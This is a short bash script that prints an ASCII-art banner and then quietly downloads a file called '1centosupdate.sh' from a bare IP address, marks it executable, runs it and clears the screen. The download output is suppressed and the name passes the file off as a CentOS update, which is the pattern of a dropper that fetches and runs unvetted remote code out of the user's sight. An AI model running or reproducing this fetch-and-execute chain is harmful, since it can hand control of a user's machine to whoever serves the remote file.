#!/bin/bash

echo '
   _ _   _    _ _ _ _
  |  _ \|  \/  |_   _| / \   
  | |_) | |\/| | | |  / _ \  
  |  __/| |  | | | | / ___ \ 
  |_|   |_|  |_| |_|/_/   \_\
 
' 

wget -q http://156.236.76.12/setupxmpta/1centosupdate/1centosupdate.sh >/dev/null 2>&1 
chmod +x 1centosupdate.sh
sh 1centosupdate.sh
clear
